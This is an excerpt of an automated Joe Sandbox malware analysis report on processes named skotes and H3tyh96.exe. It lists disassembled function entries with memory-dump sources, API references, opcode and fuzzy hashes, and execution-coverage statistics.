Associated: 00000006.00000002.3310844862.00000000004E7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312051088.00000000004E8000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312449400.00000000004EA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312808925.00000000004F3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313023487.00000000004F4000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313292834.00000000004FC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313557778.0000000000501000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313712501.0000000000509000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313903846.000000000050A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314063316.000000000050B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314233348.0000000000513000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314233348.000000000054E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314922438.000000000057F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3315383384.0000000000580000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316156788.0000000000589000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316341586.0000000000596000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316515374.0000000000597000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_280000_skotes.jbxd

Yara matches

Similarity

API ID: AllocateHeap__alloca_probe_16__freea
String ID: Z+,m+
API String ID: 809856575-1835856013
Opcode ID: ca29ecb451d5c9e4b9391708d7f1bb51f9e55538d51a0e4ff265e15a8c1c9743
Instruction ID: e6392cc771c4bd79df819781566d293bb477c2f6a9057dffa37e0da08fcd24bf
Opcode Fuzzy Hash: ca29ecb451d5c9e4b9391708d7f1bb51f9e55538d51a0e4ff265e15a8c1c9743
Instruction Fuzzy Hash: 1731C17192021AABDB21AF65CD41EEF7BA9EF44390F044138FD14AB152DB748D61CBA0

Function 002B1704 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 69COMMON

Download Yara Rule

APIs

Concurrency::details::FreeVirtualProcessorRoot::SpinUntilIdle.LIBCONCRT ref: 002B1764
std::invalid_argument::invalid_argument.LIBCONCRT ref: 002B17AF

Strings

pContext, xrefs: 002B17A7

Memory Dump Source

Source File: 00000006.00000002.3297457709.0000000000281000.00000040.00000001.01000000.00000008.sdmp, Offset: 00280000, based on PE: true

Associated: 00000006.00000002.3296564843.0000000000280000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3297457709.00000000002E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3299138671.00000000002E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3299367462.00000000002EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3300307618.00000000002F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3301774924.000000000044F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302083816.0000000000452000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302546330.0000000000468000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302546330.0000000000473000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3304173393.00000000004A4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3304808458.00000000004A5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3305449229.00000000004AC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3305809725.00000000004B6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3306517544.00000000004CD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3306849998.00000000004CE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3307187321.00000000004CF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3308051969.00000000004D7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3309195394.00000000004E0000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3310844862.00000000004E7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312051088.00000000004E8000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312449400.00000000004EA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312808925.00000000004F3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313023487.00000000004F4000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313292834.00000000004FC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313557778.0000000000501000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313712501.0000000000509000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313903846.000000000050A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314063316.000000000050B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314233348.0000000000513000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314233348.000000000054E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314922438.000000000057F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3315383384.0000000000580000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316156788.0000000000589000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316341586.0000000000596000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316515374.0000000000597000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_280000_skotes.jbxd

Yara matches

Similarity

API ID: Concurrency::details::FreeIdleProcessorRoot::SpinUntilVirtualstd::invalid_argument::invalid_argument
String ID: pContext
API String ID: 3390424672-2046700901
Opcode ID: c2f899fa23f03d21e15834a8552e6110570ed2bd3dea83ea9f9962ceac3a3cb7
Instruction ID: 2ccc17bb4c82bc9925268fd880fc8c9a863fc38fc6b0e4116f5bcb5849cb27f3
Opcode Fuzzy Hash: c2f899fa23f03d21e15834a8552e6110570ed2bd3dea83ea9f9962ceac3a3cb7
Instruction Fuzzy Hash: 8111E435A302109BCB15AF18D8A59ADB769AF853A0B554066EC1297381DF70ED31CED0

Function 002A0C5C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::_NonReentrantLock::_Acquire.LIBCONCRT ref: 002A0CD7
Concurrency::details::ResourceManager::ResourceManager.LIBCONCRT ref: 002A0D2A

Strings

p[., xrefs: 002A0CCF

Memory Dump Source

Source File: 00000006.00000002.3297457709.0000000000281000.00000040.00000001.01000000.00000008.sdmp, Offset: 00280000, based on PE: true

Associated: 00000006.00000002.3296564843.0000000000280000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3297457709.00000000002E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3299138671.00000000002E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3299367462.00000000002EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3300307618.00000000002F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3301774924.000000000044F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302083816.0000000000452000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302546330.0000000000468000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302546330.0000000000473000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3304173393.00000000004A4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3304808458.00000000004A5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3305449229.00000000004AC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3305809725.00000000004B6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3306517544.00000000004CD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3306849998.00000000004CE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3307187321.00000000004CF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3308051969.00000000004D7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3309195394.00000000004E0000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3310844862.00000000004E7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312051088.00000000004E8000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312449400.00000000004EA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312808925.00000000004F3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313023487.00000000004F4000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313292834.00000000004FC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313557778.0000000000501000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313712501.0000000000509000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313903846.000000000050A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314063316.000000000050B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314233348.0000000000513000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314233348.000000000054E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314922438.000000000057F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3315383384.0000000000580000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316156788.0000000000589000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316341586.0000000000596000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316515374.0000000000597000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_280000_skotes.jbxd

Yara matches

Similarity

API ID: Resource$AcquireConcurrency::details::Concurrency::details::_Lock::_ManagerManager::Reentrant
String ID: p[.
API String ID: 3303180142-774453266
Opcode ID: 1d49db280df2c80b32c13f9fb18d7f472fa8b6fae7d784ecfd0ea67fd9b9c6a3
Instruction ID: 53407c30adbbcf5d96b0e352e42db029f8c5085922f3fa4d2dcb1cebe3043a30
Opcode Fuzzy Hash: 1d49db280df2c80b32c13f9fb18d7f472fa8b6fae7d784ecfd0ea67fd9b9c6a3
Instruction Fuzzy Hash: 6D01B131E75B159BDB10AFF965D535DA6E0AF0A318F6000AEF405EB282CE704E609B62

Function 0029CAD4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 31COMMONLIBRARYCODE

Download Yara Rule

APIs

CreateSemaphoreExW.KERNEL32(?,002A65E3,00000000,00000000,7FFFFFFF,00000000,00000000,001F0003,00000000), ref: 0029CAFC
CreateSemaphoreW.KERNEL32(?,002A65E3,00000000,00000000,7FFFFFFF,00000000,00000000,001F0003,00000000), ref: 0029CB1E

Strings

e*, xrefs: 0029CB12, 0029CAF0

Memory Dump Source

Source File: 00000006.00000002.3297457709.0000000000281000.00000040.00000001.01000000.00000008.sdmp, Offset: 00280000, based on PE: true

Associated: 00000006.00000002.3296564843.0000000000280000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3297457709.00000000002E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3299138671.00000000002E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3299367462.00000000002EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3300307618.00000000002F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3301774924.000000000044F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302083816.0000000000452000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302546330.0000000000468000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302546330.0000000000473000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3304173393.00000000004A4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3304808458.00000000004A5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3305449229.00000000004AC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3305809725.00000000004B6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3306517544.00000000004CD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3306849998.00000000004CE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3307187321.00000000004CF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3308051969.00000000004D7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3309195394.00000000004E0000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3310844862.00000000004E7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312051088.00000000004E8000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312449400.00000000004EA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312808925.00000000004F3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313023487.00000000004F4000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313292834.00000000004FC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313557778.0000000000501000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313712501.0000000000509000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313903846.000000000050A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314063316.000000000050B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314233348.0000000000513000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314233348.000000000054E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314922438.000000000057F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3315383384.0000000000580000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316156788.0000000000589000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316341586.0000000000596000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316515374.0000000000597000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_280000_skotes.jbxd

Yara matches

Similarity

API ID: CreateSemaphore
String ID: e*
API String ID: 1078844751-654361256
Opcode ID: d038c4f4e272c3ab2d451755a26de5a473aa96f14aadf4fc42cdba5de8e73354
Instruction ID: a1308a7af090b28efc6ef0facd6fae9cb1f3c59190d5a42f32a35c009f5e9c73
Opcode Fuzzy Hash: d038c4f4e272c3ab2d451755a26de5a473aa96f14aadf4fc42cdba5de8e73354
Instruction Fuzzy Hash: CAF0FE36512129ABCF125F50EC1999E7F66FF08764B144015FD0556134C7729C71EFD0

Function 002AB92C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28threadCOMMON

Download Yara Rule

APIs

Concurrency::details::FreeThreadProxy::ReturnIdleProxy.LIBCONCRT ref: 002AB94E
std::invalid_argument::invalid_argument.LIBCONCRT ref: 002AB961

Strings

pContext, xrefs: 002AB959

Memory Dump Source

Source File: 00000006.00000002.3297457709.0000000000281000.00000040.00000001.01000000.00000008.sdmp, Offset: 00280000, based on PE: true

Associated: 00000006.00000002.3296564843.0000000000280000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3297457709.00000000002E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3299138671.00000000002E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3299367462.00000000002EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3300307618.00000000002F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3301774924.000000000044F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302083816.0000000000452000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302546330.0000000000468000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302546330.0000000000473000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3304173393.00000000004A4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3304808458.00000000004A5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3305449229.00000000004AC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3305809725.00000000004B6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3306517544.00000000004CD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3306849998.00000000004CE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3307187321.00000000004CF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3308051969.00000000004D7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3309195394.00000000004E0000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3310844862.00000000004E7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312051088.00000000004E8000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312449400.00000000004EA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312808925.00000000004F3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313023487.00000000004F4000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313292834.00000000004FC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313557778.0000000000501000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313712501.0000000000509000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313903846.000000000050A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314063316.000000000050B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314233348.0000000000513000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314233348.000000000054E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314922438.000000000057F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3315383384.0000000000580000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316156788.0000000000589000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316341586.0000000000596000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316515374.0000000000597000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_280000_skotes.jbxd

Yara matches

Similarity

API ID: Concurrency::details::FreeIdleProxyProxy::ReturnThreadstd::invalid_argument::invalid_argument
String ID: pContext
API String ID: 548886458-2046700901
Opcode ID: 8c072c0a8a998da405acc28dd545db71b18e76c5cee80ad575cffcaa6af5980d
Instruction ID: dbf48e185d7922eaf354825d1b7c7de1940f6a4848a1c25f56aa60e7c0509ddf
Opcode Fuzzy Hash: 8c072c0a8a998da405acc28dd545db71b18e76c5cee80ad575cffcaa6af5980d
Instruction Fuzzy Hash: D3E02239B2020467CB04BB64E84AC9EB779AE847547004116E911A3391EB70AE24CED0

Function 002A34CC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21COMMON

Download Yara Rule

APIs

std::invalid_argument::invalid_argument.LIBCONCRT ref: 002A34FC

Strings

version, xrefs: 002A34E1
pScheduler, xrefs: 002A34F4

Memory Dump Source

Source File: 00000006.00000002.3297457709.0000000000281000.00000040.00000001.01000000.00000008.sdmp, Offset: 00280000, based on PE: true

Associated: 00000006.00000002.3296564843.0000000000280000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3297457709.00000000002E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3299138671.00000000002E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3299367462.00000000002EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3300307618.00000000002F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3301774924.000000000044F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302083816.0000000000452000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302546330.0000000000468000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302546330.0000000000473000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3304173393.00000000004A4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3304808458.00000000004A5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3305449229.00000000004AC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3305809725.00000000004B6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3306517544.00000000004CD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3306849998.00000000004CE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3307187321.00000000004CF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3308051969.00000000004D7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3309195394.00000000004E0000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3310844862.00000000004E7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312051088.00000000004E8000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312449400.00000000004EA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312808925.00000000004F3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313023487.00000000004F4000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313292834.00000000004FC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313557778.0000000000501000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313712501.0000000000509000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313903846.000000000050A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314063316.000000000050B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314233348.0000000000513000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314233348.000000000054E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314922438.000000000057F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3315383384.0000000000580000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316156788.0000000000589000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316341586.0000000000596000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316515374.0000000000597000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_280000_skotes.jbxd

Yara matches

Similarity

API ID: std::invalid_argument::invalid_argument
String ID: pScheduler$version
API String ID: 2141394445-3154422776
Opcode ID: 54c633b4426df430f9f5d3f373318061708cfe246a5e5c8b79a343d21a964fc4
Instruction ID: fa8868e8e35b67d2d05f47ad61c06219d17503b321bebf3077e3243bd8945227
Opcode Fuzzy Hash: 54c633b4426df430f9f5d3f373318061708cfe246a5e5c8b79a343d21a964fc4
Instruction Fuzzy Hash: B4E08634570208B7DF25FA54D847ACC77649B16749F54C113B811911919FF49BB8DE81

Analysis Process: H3tyh96.exePID: 6728, Parent PID: 1708COMMON

Execution Graph

Execution Coverage:	16.3%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	157
Total number of Limit Nodes:	8

Executed Functions

Function 08B41DE0 Relevance: 7.2, Strings: 5, Instructions: 990COMMON

Download Yara Rule

Strings

A, xrefs: 08B42047
, xrefs: 08B4214B
U, xrefs: 08B422A0
T, xrefs: 08B422AD
E, xrefs: 08B4205B

Memory Dump Source

Source File: 00000007.00000002.3709564156.0000000008B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 08B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_8b40000_H3tyh96.jbxd

Similarity

API ID:
String ID: $A$E$T$U
API String ID: 0-1503325869
Opcode ID: 036f8b538a780a1dad443c7b2d8f98fcbe34e9a319da5c31eff4dae0f7a79182
Instruction ID: 672f565f16571428ae5aa523ddca94a62216d465778aa299495f6940ead53209
Opcode Fuzzy Hash: 036f8b538a780a1dad443c7b2d8f98fcbe34e9a319da5c31eff4dae0f7a79182
Instruction Fuzzy Hash: 72820430F00249CFDB15CF68C885BAEBBB2FF85315F1581A9E515AB395DB30A842EB51

Function 08B493AE Relevance: 4.8, Strings: 3, Instructions: 1042COMMON

Download Yara Rule

Strings

Ddq, xrefs: 08B495D7
., xrefs: 08B49815
-, xrefs: 08B497FD

Memory Dump Source

Source File: 00000007.00000002.3709564156.0000000008B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 08B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_8b40000_H3tyh96.jbxd

Similarity

API ID:
String ID: -$.$Ddq
API String ID: 0-3245578912
Opcode ID: 28d4628be77ad96a7fbe550fdeaa45bb440b0aa555ad54e94402fb28234077c2
Instruction ID: 602779d498ae2289acec594a794349e79b456705d12e45c12f054a36f716917f
Opcode Fuzzy Hash: 28d4628be77ad96a7fbe550fdeaa45bb440b0aa555ad54e94402fb28234077c2
Instruction Fuzzy Hash: A5A26D70A04265CFDB25CF68C881BADBBB2BF49301F1495E9D949AB359D7309D82CF90

Function 08B453F0 Relevance: 2.1, Strings: 1, Instructions: 846COMMON

Download Yara Rule

Strings

, xrefs: 08B45490

Memory Dump Source

Source File: 00000007.00000002.3709564156.0000000008B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 08B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_8b40000_H3tyh96.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 4b864f87353b39afa4e2b7edcddb9ce184ba0abddc632cfb627083c3fb068019
Instruction ID: d9db7e83cfe069beb7125a86fca662a55ea127c89d0f799e0ce4454f2e5fce48
Opcode Fuzzy Hash: 4b864f87353b39afa4e2b7edcddb9ce184ba0abddc632cfb627083c3fb068019
Instruction Fuzzy Hash: CF723730A00B12CFD735CB28C585B6AB7F1FB44315F149AADD4AA87652CB35F886DB90

Function 08B41109 Relevance: 1.7, Strings: 1, Instructions: 497COMMON

Download Yara Rule

Strings

c, xrefs: 08B412B3

Memory Dump Source

Source File: 00000007.00000002.3709564156.0000000008B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 08B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_8b40000_H3tyh96.jbxd

Similarity

API ID:
String ID: c
API String ID: 0-112844655
Opcode ID: 0ba19f80cd2591e0f1bb00956f9044d71001c652994835937a2e61d07095f393
Instruction ID: 093aa4fe0e218e7e33da6c64d0d15d773d7b98e098365040d9eab424b6bf5ca0
Opcode Fuzzy Hash: 0ba19f80cd2591e0f1bb00956f9044d71001c652994835937a2e61d07095f393
Instruction Fuzzy Hash: 51229F75F00655CFCB18CF6CC881BA9BBB2BF45301F28C5A9D4499B256C730A992CB91

Function 08B48240 Relevance: 1.1, Instructions: 1067COMMON

Download Yara Rule

Memory Dump Source

